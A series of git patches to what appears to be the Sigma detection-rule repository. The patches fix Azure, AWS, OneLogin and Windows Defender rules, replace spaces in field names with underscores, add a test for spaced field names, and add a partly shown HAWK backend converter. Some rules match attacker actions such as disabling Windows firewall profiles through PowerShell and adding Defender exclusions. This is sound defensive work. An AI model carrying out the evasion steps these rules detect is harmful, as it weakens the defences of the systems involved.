rules/cloud/azure/azure_account_lockout.yml | 4 +++- rules/cloud/azure/azure_change_to_authentication_method.yml | 4 +++- rules/cloud/azure/azure_login_to_disabled_account.yml | 4 +++- rules/cloud/azure/azure_mfa_interrupted.yml | 4 +++- .../azure/azure_user_login_blocked_by_conditional_access.yml | 4 +++- 5 files changed, 15 insertions(+), 5 deletions(-) diff --git a/rules/cloud/azure/azure_account_lockout.yml b/rules/cloud/azure/azure_account_lockout.yml index 12ac7162..c2abe63c 100644 --- a/rules/cloud/azure/azure_account_lockout.yml +++ b/rules/cloud/azure/azure_account_lockout.yml @@ -7,12 +7,14 @@ description: Identifies user account which has been locked because the user trie references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 50053 condition: selection level: medium +falsepositives: + - Unknown tags: - attack.credential_access - attack.t1110 diff --git a/rules/cloud/azure/azure_change_to_authentication_method.yml b/rules/cloud/azure/azure_change_to_authentication_method.yml index 171932f3..a6d43f7d 100644 --- a/rules/cloud/azure/azure_change_to_authentication_method.yml +++ b/rules/cloud/azure/azure_change_to_authentication_method.yml @@ -7,7 +7,7 @@ description: Change to authentication method could be an indicated of an attacke references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: AuditLogs + service: azure.auditlogs detection: selection: LoggedByService: 'Authentication Methods' @@ -15,5 +15,7 @@ detection: OperationName: 'User registered security info' condition: selection level: medium +falsepositives: + - Unknown tags: - attack.credential_access diff --git a/rules/cloud/azure/azure_login_to_disabled_account.yml b/rules/cloud/azure/azure_login_to_disabled_account.yml index a89c07d5..48a1b501 100644 --- a/rules/cloud/azure/azure_login_to_disabled_account.yml +++ b/rules/cloud/azure/azure_login_to_disabled_account.yml @@ -7,13 +7,15 @@ description: Detect failed attempts to sign in to disabled accounts. references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 50057 ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' condition: selection level: medium +falsepositives: + - Unknown tags: - attack.initial_access - attack.t1078 diff --git a/rules/cloud/azure/azure_mfa_interrupted.yml b/rules/cloud/azure/azure_mfa_interrupted.yml index 2f381252..22d5e37c 100644 --- a/rules/cloud/azure/azure_mfa_interrupted.yml +++ b/rules/cloud/azure/azure_mfa_interrupted.yml @@ -7,7 +7,7 @@ description: Identifies user login with multifactor authentication failures, whi references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 50074 @@ -17,6 +17,8 @@ detection: ResultDescription|contains: 'Authentication failed during strong authentication request' condition: selection or selection1 level: medium +falsepositives: + - Unknown tags: - attack.initial_access - attack.t1078.004 diff --git a/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml index 3ac01e8c..9dff5f2d 100644 --- a/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml +++ b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml @@ -7,12 +7,14 @@ description: Detect access has been blocked by Conditional Access policies. The references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 53003 condition: selection level: medium +falsepositives: + - Unknown tags: - attack.credential_access - attack.t1110 From 010b0e28686250ad3760423ab209c51c0afbdb77 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 06:58:57 -0500 Subject: [PATCH 1215/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index dfc15fc6..d22ebd8b 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -11,12 +11,9 @@ logsource: service: cloudtrail detection: selection1: - eventSource: lambda.amazonaws.com - eventName: PassRole - selection2: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint - condition: selection1 and selection2 + condition: selection1 level: low tags: - attack.privilege_escalation From e08f6333b810eff9a50a5a2ff8e49be0ed8591bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 06:59:13 -0500 Subject: [PATCH 1216/1367] Update aws_pass_role_to_lambda_function.yml --- rules/cloud/aws/aws_pass_role_to_lambda_function.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml index 3c38c959..f8047050 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml @@ -10,15 +10,12 @@ logsource: service: cloudtrail detection: selection1: - eventSource: iam.amazonaws.com - eventName: PassRole - selection2: eventSource: lambda.amazonaws.com eventName: CreateFunction - selection3: + selection2: eventSource: lambda.amazonaws.com eventName: InvokeFunction - condition: selection1 and selection2 and selection3 + condition: selection1 and selection2 level: low tags: - attack.privilege_escalation From 4e43fce6297692f0b17b0bedcab56d9540029b29 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 07:01:04 -0500 Subject: [PATCH 1217/1367] Update powershell_windows_firewall_profile_disabled.yml --- .../powershell_windows_firewall_profile_disabled.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml index 3d3a596b..eb7f1ed0 100644 --- a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml +++ b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml @@ -14,7 +14,8 @@ logsource: service: powershell detection: selection: - CommandLine|contains|all: + EventID: 4104 + ScriptBlockText|contains|all: - Set-NetFirewallProfile - -Profile - -Enabled From 756d5b5aa6ddbb17ab689951b9e7911e107dfe4c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 07:02:01 -0500 Subject: [PATCH 1218/1367] Update onelogin_user_account_locked.yml --- rules/cloud/onelogin/onelogin_user_account_locked.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/cloud/onelogin/onelogin_user_account_locked.yml b/rules/cloud/onelogin/onelogin_user_account_locked.yml index 32225dc0..d43ddf3b 100644 --- a/rules/cloud/onelogin/onelogin_user_account_locked.yml +++ b/rules/cloud/onelogin/onelogin_user_account_locked.yml @@ -11,14 +11,14 @@ logsource: service: onelogin.events detection: selection1: # Locked via API - eventtypeid: 532 + event_type_id: 532 selection2: # Locked via API - eventtypeid: 553 + event_type_id: 553 selection3: # Suspended via API - eventtypeid: 551 + event_type_id: 551 condition: 1 of them level: low tags: - attack.impact falsepositives: - - System may lock or suspend user accounts. \ No newline at end of file + - System may lock or suspend user accounts. From 5c3cdbe845a3b54e1b2a982cebb7de307694443b Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:20:26 +0200 Subject: [PATCH 1219/1367] fix: replace space with _ --- rules/windows/other/win_defender_amsi_trigger.yml | 4 ++-- rules/windows/other/win_defender_exclusions.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index 2478a55c..a4ee7b2d 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -13,11 +13,11 @@ logsource: detection: selection: EventID: 1116 - Source Name: 'AMSI' + Source_Name: 'AMSI' condition: selection falsepositives: - unlikely level: high tags: - attack.execution - - attack.t1059 \ No newline at end of file + - attack.t1059 diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 3862ad15..517e3009 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml @@ -17,8 +17,8 @@ logsource: detection: selection1: EventID: 5007 - New Value|contains: '\Microsoft\Windows Defender\Exclusions' + New_Value|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection1 falsepositives: - Administrator actions -level: medium \ No newline at end of file +level: medium From 9ddabe18ed16d4da04ea070db9166842e3b8b2fd Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:21:23 +0200 Subject: [PATCH 1220/1367] feat: testing for space in field names --- tests/test_rules.py | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 3354ba87..2e6e0769 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -154,6 +154,24 @@ class TestRules(unittest.TestCase): self.assertEqual(files_with_duplicate_filters, [], Fore.RED + "There are rules with duplicate filters") + def test_field_name_with_space(self): + def key_iterator(fields, faulty): + for key, value in fields.items(): + if " " in key: + faulty.append(key) + print(Fore.YELLOW + "Rule {} has a space in field name ({}).".format(file, key)) + if type(value) == dict: + key_iterator(value, faulty) + + faulty_fieldnames = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + yaml = self.get_rule_yaml(file_path = file) + detection = self.get_rule_part(file_path = file, part_name = "detection") + key_iterator(detection, faulty_fieldnames) + + self.assertEqual(faulty_fieldnames, [], Fore.RED + + "There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character if the log source uses space)") + def test_single_named_condition_with_x_of_them(self): faulty_detections = [] From 7c8a7358823494a751bdc4442259b5bd4cb27192 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:22:48 +0200 Subject: [PATCH 1221/1367] fix: change modifed date --- rules/windows/other/win_defender_amsi_trigger.yml | 2 +- rules/windows/other/win_defender_exclusions.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index a4ee7b2d..7dadd113 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -2,7 +2,7 @@ title: Windows Defender AMSI Trigger Detected id: ea9bf0fa-edec-4fb8-8b78-b119f2528186 description: Detects triggering of AMSI by Windows Defender. date: 2020/09/14 -modified: 2021/08/06 +modified: 2021/10/13 author: Bhabesh Raj references: - https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 517e3009..3f31c3b6 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml @@ -2,7 +2,7 @@ title: Windows Defender Exclusions Added id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f description: Detects the Setting of Windows Defender Exclusions date: 2021/07/06 -modified: 2021/09/21 +modified: 2021/10/13 author: Christian Burkard references: - https://twitter.com/_nullbind/status/1204923340810543109 From 81b4a0eb982beca21639d5ee72721123042b9914 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:36:10 +0200 Subject: [PATCH 1222/1367] feat: adapt logsources for field names without spaces --- tools/config/arcsight-zeek.yml | 4 +- tools/config/ecs-proxy.yml | 2 +- tools/config/ecs-zeek-corelight.yml | 4 +- tools/config/humio.yml | 4 +- tools/config/logstash-zeek-default-json.yml | 4 +- tools/config/splunk-zeek.yml | 4 +- tools/config/winlogbeat-modules-enabled.yml | 70 ++++++++++----------- 7 files changed, 46 insertions(+), 46 deletions(-) diff --git a/tools/config/arcsight-zeek.yml b/tools/config/arcsight-zeek.yml index a9272cc2..097c8b21 100644 --- a/tools/config/arcsight-zeek.yml +++ b/tools/config/arcsight-zeek.yml @@ -1103,7 +1103,7 @@ fieldmappings: # - url.registered_domain # - destination.registered_domain post_url_parameter: requestUrl - Request Url: requestUrl + Request_Url: requestUrl request_url: requestUrl request_URL: requestUrl RequestUrl: requestUrl @@ -1149,7 +1149,7 @@ fieldmappings: UserAgent: - deviceCustomString5 - requestClientApplication - User Agent: + User_Agent: - deviceCustomString5 - requestClientApplication web_dest: destinationHostName diff --git a/tools/config/ecs-proxy.yml b/tools/config/ecs-proxy.yml index eabb3c52..a32aa063 100644 --- a/tools/config/ecs-proxy.yml +++ b/tools/config/ecs-proxy.yml @@ -119,7 +119,7 @@ fieldmappings: - url.registered_domain - destination.registered_domain post_url_parameter: url.original - Request Url: url.original + Request_Url: url.original request_url: url.original request_URL: url.original RequestUrl: url.original diff --git a/tools/config/ecs-zeek-corelight.yml b/tools/config/ecs-zeek-corelight.yml index 8fd59d94..f1868e0f 100644 --- a/tools/config/ecs-zeek-corelight.yml +++ b/tools/config/ecs-zeek-corelight.yml @@ -1226,7 +1226,7 @@ fieldmappings: # - url.registered_domain # - destination.registered_domain post_url_parameter: url.original - Request Url: url.original + Request_Url: url.original request_url: url.original request_URL: url.original RequestUrl: url.original @@ -1262,7 +1262,7 @@ fieldmappings: User-Agent: user_agent.original useragent: user_agent.original UserAgent: user_agent.original - User Agent: user_agent.original + User_Agent: user_agent.original web_dest: - url.domain - destination.domain diff --git a/tools/config/humio.yml b/tools/config/humio.yml index dce843f8..a4b6d217 100644 --- a/tools/config/humio.yml +++ b/tools/config/humio.yml @@ -511,7 +511,7 @@ fieldmappings: product=zeek: uri post_url_parameter: product=zeek: uri - Request Url: + Request_Url: product=zeek: uri request_url: product=zeek: uri @@ -567,7 +567,7 @@ fieldmappings: product=zeek: user_agent UserAgent: product=zeek: user_agent - User Agent: + User_Agent: product=zeek: user_agent web_dest: product=zeek: host diff --git a/tools/config/logstash-zeek-default-json.yml b/tools/config/logstash-zeek-default-json.yml index c4332f32..7b9da224 100644 --- a/tools/config/logstash-zeek-default-json.yml +++ b/tools/config/logstash-zeek-default-json.yml @@ -400,7 +400,7 @@ fieldmappings: in_url: uri # parent_domain: # Not in open source zeek post_url_parameter: uri - Request Url: uri + Request_Url: uri request_url: uri request_URL: uri RequestUrl: uri @@ -433,7 +433,7 @@ fieldmappings: User-Agent: user_agent useragent: user_agent UserAgent: user_agent - User Agent: user_agent + User_Agent: user_agent web_dest: - host - query diff --git a/tools/config/splunk-zeek.yml b/tools/config/splunk-zeek.yml index 1cefcca7..087d5a99 100644 --- a/tools/config/splunk-zeek.yml +++ b/tools/config/splunk-zeek.yml @@ -392,7 +392,7 @@ fieldmappings: in_url: uri # parent_domain: # Not in open source zeek post_url_parameter: uri - Request Url: uri + Request_Url: uri request_url: uri request_URL: uri RequestUrl: uri @@ -425,7 +425,7 @@ fieldmappings: User-Agent: user_agent useragent: user_agent UserAgent: user_agent - User Agent: user_agent + User_Agent: user_agent web_dest: - host - query diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index c21d189e..99c98191 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -503,40 +503,40 @@ fieldmappings: # # Microsoft-Windows-Windows Defender/Operational # - Action ID: winlog.event_data.Action\ ID - Action Name: winlog.event_data.Action\ Name - Additional Actions ID: winlog.event_data.Additional\ Actions\ ID - Additional Actions String: winlog.event_data.Additional\ Actions\ String - Category ID: winlog.event_data.Category\ ID - Category Name: winlog.event_data.Category\ Name - Detection ID: winlog.event_data.Detection\ ID - Detection Time: winlog.event_data.Detection\ Time - Detection User: winlog.event_data.Detection\ User - Engine Version: winlog.event_data.Engine\ Version - Error Code: winlog.event_data.Error\ Code - Error Description: winlog.event_data.Error\ Description - Execution ID: winlog.event_data.Execution\ ID - Execution Name: winlog.event_data.Execution\ Name + Action_ID: winlog.event_data.Action\ ID + Action_Name: winlog.event_data.Action\ Name + Additional_Actions_ID: winlog.event_data.Additional\ Actions\ ID + Additional_Actions_String: winlog.event_data.Additional\ Actions\ String + Category_ID: winlog.event_data.Category\ ID + Category_Name: winlog.event_data.Category\ Name + Detection_ID: winlog.event_data.Detection\ ID + Detection_Time: winlog.event_data.Detection\ Time + Detection_User: winlog.event_data.Detection\ User + Engine_Version: winlog.event_data.Engine\ Version + Error_Code: winlog.event_data.Error\ Code + Error_Description: winlog.event_data.Error\ Description + Execution_ID: winlog.event_data.Execution\ ID + Execution_Name: winlog.event_data.Execution\ Name FWLink: winlog.event_data.FWLink - New Value: winlog.event_data.New\ Value - Old Value: winlog.event_data.Old\ Value - Origin ID: winlog.event_data.Origin\ ID - Origin Name: winlog.event_data.Origin\ Name + New_Value: winlog.event_data.New\ Value + Old_Value: winlog.event_data.Old\ Value + Origin_ID: winlog.event_data.Origin\ ID + Origin_Name: winlog.event_data.Origin\ Name Path: winlog.event_data.Path - Post Clean Status: winlog.event_data.Post\ Clean\ Status - Pre Execution Status: winlog.event_data.Pre\ Execution\ Status - Process Name: winlog.event_data.Process\ Name - Product Name: winlog.event_data.Product\ Name - Product Version: winlog.event_data.Product\ Version - Remediation User: winlog.event_data.Remediation\ User - Security intelligence Version: winlog.event_data.Security\ intelligence\ Version - Severity ID: winlog.event_data.Severity\ ID - Severity Name: winlog.event_data.Severity\ Name - Source ID: winlog.event_data.Source\ ID - Source Name: winlog.event_data.Source\ Name - Status Code: winlog.event_data.Status\ Code - Status Description: winlog.event_data.Status\ Description - Threat ID: winlog.event_data.Threat\ ID - Threat Name: winlog.event_data.Threat\ Name - Type ID: winlog.event_data.Type\ ID - Type Name: winlog.event_data.Type\ Name + Post_Clean_Status: winlog.event_data.Post\ Clean\ Status + Pre_Execution_Status: winlog.event_data.Pre\ Execution\ Status + Process_Name: winlog.event_data.Process\ Name + Product_Name: winlog.event_data.Product\ Name + Product_Version: winlog.event_data.Product\ Version + Remediation_User: winlog.event_data.Remediation\ User + Security_intelligence_Version: winlog.event_data.Security\ intelligence\ Version + Severity_ID: winlog.event_data.Severity\ ID + Severity_Name: winlog.event_data.Severity\ Name + Source_ID: winlog.event_data.Source\ ID + Source_Name: winlog.event_data.Source\ Name + Status_Code: winlog.event_data.Status\ Code + Status_Description: winlog.event_data.Status\ Description + Threat_ID: winlog.event_data.Threat\ ID + Threat_Name: winlog.event_data.Threat\ Name + Type_ID: winlog.event_data.Type\ ID + Type_Name: winlog.event_data.Type\ Name From 1f5d9d8adc8339c7b4303ea15442a3a46fcfe510 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Wed, 13 Oct 2021 14:36:49 +0000 Subject: [PATCH 1223/1367] Initial commmit of hawk analytic score generator --- tools/config/hawk.yml | 99 +++++++++ tools/sigma/backends/hawk.py | 415 +++++++++++++++++++++++++++++++++++ 2 files changed, 514 insertions(+) create mode 100644 tools/config/hawk.yml create mode 100644 tools/sigma/backends/hawk.py diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml new file mode 100644 index 00000000..5caf6ede --- /dev/null +++ b/tools/config/hawk.yml @@ -0,0 +1,99 @@ +title: HAWK +order: 20 +backends: + - hawk +fieldmappings: + dst: + - ip_dst_host + dst_ip: + - ip_dst + src: + - ip_src_host + src_ip: + - ip_src + category: vendor_category + error: error_code + key: event_key + payload: event_payload + weight: event_weight + account type: account_type + PrivilegeList: process_privileges + pid_user: event_username + sid: correlation_session_id + UserSid: correlation_session_id + TargetSid: target_session_id + TargetUserName: target_username + SamAccountName: target_username + AccountName: target_username + TargetDomainName: target_domain + DnsServerIpAddress: dns_address + QueryName: hostname_dst + AuthenticationPackageName: package_name + HostProcess: image + Application: image + ProcessName: image + TargetImage: target_image + Parent Image: parent_image + ParentImage: parent_image + Caller Process Name: parent_image + CallerProcessName: parent_image + ParentProcessName: parent_image + CommandLine: command + ProcessCommandLine: command + ParentCommandLine: parent_command + IMPHASH: file_hash_imphash + SHA256: file_hash_sha256 + MD5: file_hash_md5 + SHA1: file_hash_sha1 + SubjectUserSid: correlation_session_id + SubjectSid: correlation_session_id + SubjectUserName: correlation_username + SubjectDomainName: correlation_domain + SubjectLogonId: correlation_logon_id + pid: event_pid + ProccessId: pid + NewProcessName: image + ServiceName: service_name + Service: service_name + ServiceFileName: filename + TargetObject: target_object + EventID: vendor_id + SourceImage: parent_image + Description: image_description + Product: image_product + Company: image_company + CurrentDirectory: path + ShareName: path + RelativeTargetName: filename + TargetName: value + Initiated: value + Accesses: access_mask + LDAPDisplayName: distinguished_name + AttributeLDAPDisplayName: distinguished_name + AttributeValue: value + ParentProcessId: parent_pid + SourceProcessId: source_pid + TargetProcessId: target_pid + Signed: signature + Status: value + TargetFilename: filename + TargetObject: object + ObjectClass: object_type + ObjectValueName: object_name + DeviceClassName: object_name + Details: object_target + CallTrace: calltrace + IpAddress: ip_src + DCIPAddress: ip_src + WorkstationName: hostname_src + Workstation: hostname_src + DestinationIp: ip_dst + DestinationHostname: hostname_dst + DestinationPort: ip_dport + GrantedAccess: access_mask + StartModule: target_process_name + TargetProcessAddress: process_address + TicketOptions: sys.ticket.options + TicketEncryptionType: sys.ticket.encryption.type + DetectionSource: value + Priority: event_priority diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py new file mode 100644 index 00000000..b2a775be --- /dev/null +++ b/tools/sigma/backends/hawk.py @@ -0,0 +1,415 @@ +# Output backends for sigmac - HAWK.io + + +import re +import sigma +import json +import uuid +from sigma.parser.modifiers.base import SigmaTypeModifier +from sigma.parser.modifiers.type import SigmaRegularExpressionModifier +from .base import SingleTextQueryBackend +from .mixins import MultiRuleOutputMixin + + +class HAWKBackend(SingleTextQueryBackend): + """Converts Sigma rule into HAWK search""" + identifier = "hawk" + active = True + config_required = False + default_config = ["sysmon", "hawk"] + reEscape = re.compile('(")') + reClear = None + andToken = " , " + orToken = " , " + subExpression = "{\"id\": \"and\", \"key\": \"And\", \"children\": [%s] }" + listExpression = "%s" + listSeparator = " " + valueExpression = "%s" + keyExpression = "%s" + nullExpression = "%s = null" + notNullExpression = "%s != null" + mapExpression = "%s=%s" + mapListsSpecialHandling = True + aql_database = "events" + + def cleanKey(self, key): + if key == None: + return "" + return self.sigmaparser.config.get_fieldmapping(key).resolve_fieldname(key, self.sigmaparser) + + def cleanValue(self, value): + """Remove quotes in text""" + # return value.replace("\'","\\\'") + return value + + def generateNode(self, node, notNode=False): + #print(type(node)) + #print(node) + if type(node) == sigma.parser.condition.ConditionAND: + return self.generateANDNode(node) + elif type(node) == sigma.parser.condition.ConditionOR: + #print("OR NODE") + #print(node) + return self.generateORNode(node) + elif type(node) == sigma.parser.condition.ConditionNOT: + #print("NOT NODE") + #print(node) + return self.generateNOTNode(node) + elif type(node) == sigma.parser.condition.ConditionNULLValue: + return self.generateNULLValueNode(node) + elif type(node) == sigma.parser.condition.ConditionNotNULLValue: + return self.generateNotNULLValueNode(node) + elif type(node) == sigma.parser.condition.NodeSubexpression: + #print(node) + return self.generateSubexpressionNode(node) + elif type(node) == tuple: + return self.generateMapItemNode(node, notNode) + elif type(node) in (str, int): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "regex" }, "str": { "value": "5" } } } + #key = next(iter(self.sigmaparser.parsedyaml['detection'])) + key = "payload" + + #nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['key'] = key + + #print(node) + #print("KEY: ", key) + # they imply the entire payload + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + nodeRet['args']['str']['value'] = self.generateValueNode(node, False) + # return json.dumps(nodeRet) + return nodeRet + elif type(node) == list: + return self.generateListNode(node, notNode) + else: + raise TypeError("Node type %s was not expected in Sigma parse tree" % (str(type(node)))) + + def generateANDNode(self, node): + """ + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + return self.andToken.join(filtered) + else: + return None + """ + ret = { "id" : "and", "key": "And", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateORNode(self, node): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateSubexpressionNode(self, node): + generated = self.generateNode(node.items) + if 'len'in dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated + if generated: + return json.loads(self.subExpression % json.dumps(generated)) + else: + return None + + def generateListNode(self, node, notNode=False): + if not set([type(value) for value in node]).issubset({str, int}): + raise TypeError("List values must be strings or numbers") + result = [self.generateNode(value, notNode) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + #print("LIST EXPRESSION") + #print(result) + return self.listExpression % (self.listSeparator.join(result)) + + def generateNOTNode(self, node): + generated = self.generateNode(node.item, True) + return generated + + def generateMapItemNode(self, node, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": 5 } } } + if notNode: + nodeRet["args"]["comparison"]["value"] = "!=" + nodeRet['rule_id'] = str(uuid.uuid4()) + key, value = node + if self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + if type(value) == str and "*" in value: + # value = value.replace("*", ".*") + value = value.replace("*", "") + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + nodeRet['args']['str']['value'] = value + # return "%s regex %s" % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + elif type(value) is str: + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + nodeRet['args']['str']['value'] = value + # return json.dumps(nodeRet) + return nodeRet + elif type(value) is int: + nodeRet['return'] = "int" + nodeRet['args']['int'] = { "value" : value } + del nodeRet['args']['str'] + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + else: + #return self.mapExpression % (self.cleanKey(key), self.generateNode(value)) + nodeRet['args']['str']['value'] = value + #return json.dumps(nodeRet) + return nodeRet + elif type(value) == list: + return self.generateMapItemListNode(key, value, notNode) + elif isinstance(value, SigmaTypeModifier): + return self.generateMapItemTypedNode(key, value) + elif value is None: + #return self.nullExpression % (key, ) + nodeRet['args']['str']['value'] = None + #return json.dumps(nodeRet) + return nodeRet + else: + raise TypeError("Backend does not support map values of type " + str(type(value))) + + def generateMapItemListNode(self, key, value, notNode=False): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + for item in value: + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + if item is None: + nodeRet['args']['str']['value'] = 'null' + ret['children'].append( nodeRet ) + elif type(item) == str and "*" in item: + item = item.replace("*", "") + # item = item.replace("*", ".*") + #print("item") + #print(item) + nodeRet['args']['str']['value'] = item # self.generateValueNode(item, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + ret['children'].append( nodeRet ) + else: + #print("item2") + #print(item) + nodeRet['args']['str']['value'] = self.generateValueNode(item, True) + ret['children'].append( nodeRet ) + # return json.dumps(ret) # '('+" or ".join(itemslist)+')' + return ret # '('+" or ".join(itemslist)+')' + + def generateMapItemTypedNode(self, fieldname, value, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(fieldname).lower() + nodeRet['description'] = fieldname + nodeRet['rule_id'] = str(uuid.uuid4()) + if type(value) == SigmaRegularExpressionModifier: + regex = str(value) + """ + # Regular Expressions have to match the full value in QRadar + if not (regex.startswith('^') or regex.startswith('.*')): + regex = '.*' + regex + if not (regex.endswith('$') or regex.endswith('.*')): + regex = regex + '.*' + return "%s imatches %s" % (self.cleanKey(fieldname), self.generateValueNode(regex, True)) + """ + #print("ENDS WITH!!!") + nodeRet['args']['str']['value'] = self.generateValueNode(regex, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + # return json.dumps(nodeRet) + return nodeRet + else: + raise NotImplementedError("Type modifier '{}' is not supported by backend".format(value.identifier)) + + def generateValueNode(self, node, keypresent): + """ + if keypresent == False: + return "payload regex \'{0}{1}{2}\'".format("%", self.cleanValue(str(node)), "%") + else: + return self.valueExpression % (self.cleanValue(str(node))) + """ + return self.valueExpression % (self.cleanValue(str(node))) + + def generateNULLValueNode(self, node): + # node.item + nodeRet = {"key": node.item, "description": node.item, "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "null" } } } + nodeRet['rule_id'] = str(uuid.uuid4()) + # return json.dumps(nodeRet) + return nodeRet + + def generateNotNULLValueNode(self, 